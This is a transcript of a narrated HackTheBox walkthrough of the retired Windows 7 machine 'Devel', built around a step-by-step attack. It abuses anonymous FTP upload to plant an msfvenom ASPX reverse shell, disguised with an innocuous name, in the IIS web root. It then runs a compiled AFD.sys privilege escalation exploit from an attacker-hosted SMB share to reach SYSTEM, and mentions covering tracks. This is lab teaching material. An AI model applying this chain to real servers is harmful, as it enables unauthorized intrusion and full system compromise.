Welcome back to a new video. Today's video, we're gonna solve another machine from HackTheBox. The machine is retired. The name is Devel. The machine is Windows XP, Windows 7. We're gonna solve this machine manually. We're not gonna rely on the automatic methods like Metasploit that you might have seen across the internet in the walkthroughs. Okay, so we're gonna solve this differently, hoping that you will find something different in this walkthrough. Okay, so basically here I got the nmap scan finished. And as you can see, we have only two ports, 21 and 80. Right, if we go down there, we see some options about operating system. Seems like the nmap has not done a good job in guessing the operating system. So we're going to need to find the operating system, right? So we're going to launch nmap scan again here. Instead of A, I'm going to choose S. I'm going to choose O, right? And we leave this running. And while this is running, we do the enumeration. So basically we have 21, and as you can see, we have anonymous FTP login is allowed. That's the first misconfiguration. We have 80 open. If you take a look at the web server, so we can launch Chrome. And while everything is running, we're gonna do new tab here. Okay, give me new tab, dark. Okay, so sudo ftp 10.10.10.5. We type anonymous. So we are done with FTP right now, ls. As you can see, we have been able to list the content of the directory successfully. Okay, let's hop to the web browser and type 10.10.10.5. So as you can see, we have the Internet Information Service, the basic web page of the web server. It is enough to say that after enough enumeration of the web server, I haven't found anything of interest in the web server. So our enumeration will be focused and concentrated and pinned down with the FTP. So basically here, once we have anonymous access to the FTP server, all we look to find is a way to upload files. So if we can upload files in the directory of the web server, we can do whatever we want. We can create a payload, ASPX payload, of course, because the Internet Information Service, every web page is coded in ASPX. So if we are to create a payload, the payload needs to be in ASPX and will be uploaded in the folder of web server here. So first thing to do is to test if we can upload files. So that's why we're going to split this. That's fine. And let's put something like sudo make or touch test.txt. And here we can try to put that file, okay, data connection already open, transfer starting, transfer complete, find me test, your test is here. Okay, so let's go back to the nmap scan and see if we have found the operating system here. So, okay, OS, aggressive OS guesses, Microsoft Windows 8.1, 7.5, that is still not helpful. Okay, this isn't helpful so far, right? We have many options. So we're going to proceed now with FTP. Maybe we can find something in there. So you have been able to upload whatever you want to the directory of the web server. Now your next step is to create a payload and place that payload here so you can trigger it and receive your first reverse jump. So sudo msfnm -p Windows x60. Well, that's a thing that we don't know actually, whether it's 64 or 68, 86. I'm going to pursue 64, or without specifying the architecture, Windows shell reverse TCP lhost, which is our IP address, ifconfig 1425 port 555-F ASPX. Don't forget this. And the output, we need the output within the name of this payload to be realistic enough. We want something not like shell. It's very obvious you're not going to use this name in a real penetration testing scenario. So what you want to do, you want to put a name that's descriptive and seems that the administrator has created the payload instead of you, or defined, sorry. So you put something like IIS page or demo, right? .aspx. Okay, so our payload has been created. Next step is to upload this. So put and give me the jackpot. The connection has closed. Exit. Clear. Give me the jackpot list. This is your payload, dear friend. Now, next step, listener, and see. Now, triggering the payload. Go to browser and navigate to your jackpot. So, IIS. All right. Thank you so much. You have been successful. Now, here is the first reverse shell. So, who am I dash user, and you are web, and we are a service account. So this is a service account. It's like MySQL. It is like any service account that is tied to specific service. This account is tied to perform the web server function. So, and most probably it won't have or it doesn't have much privileges that we can use, right? So if we type who am I /priv, we see a couple of privileges. So here, but most of them, we have set impersonate privilege. Okay, so we can try a couple of stuff for privilege escalation, but right now, let's stick to the basics and we're going to try different stuff. So basically, let's find the system info, because we have been battling to know what is the version of the operating system. Microsoft Windows 7 Enterprise. So this is Windows 7, and here is the OS version 6.1 7600. Yep. So that was it. This is the system version. Now, what we can do here, if we don't want to use Metasploit, we're going to need to search and research and look up. So we go to Google. In here, I type Windows 7 Enterprise 6.1.7600. 7600 exploit. Let's find. And this is, by the way, x86 or 64, the architecture processor x64. Okay, so this one probably won't work. x86. We don't want something 86. Let's see. Let's find it first, which is ms1046 afd.sys. Excel title Windows 86 all versions. Okay, AFD privilege escalation. It works on Windows 7 Enterprise. So Enterprise, Windows 7 Enterprise Service Pack 1 x86. Go up. Okay, most probably this will work. So here's the description of the vulnerability, and here are the notes, patches. Okay. So all we have to do here is to download this exploit, compile it, and execute. Let's see if there are any specific instructions for the compile process. Okay, so exploit compiling. So you download the exploit, execute this on our Kali system, right? And we upload it. So exploit download. Now, all right, go back, clear, cd out. So here we will move. This is the exploit. Sudo mv40 out. Okay, now let's rename the exploit. IIS here config, right? .c. Okay, fine. Let's go back. And take this. Okay, the rest are the names. So basically here, IIS, -o. And of course, because I am unprivileged user on my system, I'm going to type sudo. Okay. IIS config. Where are you? Which is here. Okay. Now the rest is to upload this exploit, right? But let's see first how we're gonna make this exploit working. I mean, if I launch it, what's gonna work? What's gonna happen? So it seems like I need only to start the exploit or execute it to get the root shell or the system shell, right? So let's search for something like IP. No. So it seems like we only need to execute this. Okay. We go back to our web server. Here, put IIS config exe. Okay, exit, and again connect. Put IIS config.exe. All right, let's make sure we have transferred the file successfully. So we are on the system here. Let's see the out of this. cd out and directory cd out again. So we are here. Okay, cd init pub ls dir. Okay, cd w root. So here's your payload. Now all you have to do is to execute this. Where is it? Where is it? Okay. Let's see if this is going to work. The program cannot be run in DOS mode. Okay, PowerShell. Can we do this? Seems like PowerShell isn't working here, so I'm gonna reestablish this session again. Okay. What if I downloaded this from my desktop? So here, Python 3-mhttp.server cert. Do I have this here? Okay, we have it. Cert util-url /http 1010. Oh, the IP. Okay. The IP was something like 1425. Okay. Right. Access denied. What is that? So I guess we don't have access. We can't write to this folder. So we're gonna need to cd out to the folder of the web server. Cd init root, and here is your payload. This one. And we still keep getting this program can't be run in DOS mode. All right. So it seems like we need to execute this from our machine, right? So what we're going to do here, we're going to share, right? We're going to share the payload here we have and execute it from our own side. So what we will do here, we will go to in packet, make this bigger, cd examples, and we will launch smp server.py, sudo python smp server.py. Then we type the path to the file that we're willing to share, which is our payload. Home. So we forgot to type share. Okay, we go back to our session, and here we type the path which we shared. So double backslash 10, 10, 14, 25. Another one, share. Here we type the name of the payload. Config. Execute. The system can't find the path specified. Okay, so we shared the vault successfully now. So it was a mistake on my end. Here I'm going to execute again. So I'm going to paste the share and we're going to execute. So if we type who am I slash user, and we are net authority system. Simple and easy exploitation for Windows 7, given that there are no patches to the current system. That's why you need to keep your system up to date. Okay, so what is another way we can do that? So basically here, what we can do, let's keep this interface here. We keep this connection alive. Now let's find another way to escalate our privileges, right? Or let's exit out of this. Exit. Oh, okay. Now we're going to establish a session again here. Okay. Now there is another way to do that, which is we upload some kind of privilege escalation checker, and we run it to list all of the potential vulnerabilities, right? So I'm not a fan of uploading tools to your target host, since you might not be able to cover your tracks properly because of restrictions that have to do with time, or because of restrictions that have to do with the skills. So covering tracks isn't an easy matter, right? But if you needed to upload one of your tools, we can use many tools. Actually, there are many tools to check for privilege escalation. We can use here we have, where was the tool? We can use one piece, right? Or we can use another tool from PowerShell. So here, if we type PowerShell Sherlock, so we can download this tool here. Oh. Another way we can solve this box is by, Metasploit. We can do that. We can use the suggester module to suggest all of the available exploits or of the matched exploits that can be used on this box. Yes, so you can use either Metasploit, or you can do it manually the way we did, or you can use a suggester tool like PowerShell, Sherlock, or WinPiece, or Windows Privilege Escalation Suggester whatsoever. So that was about today. See you in the next video.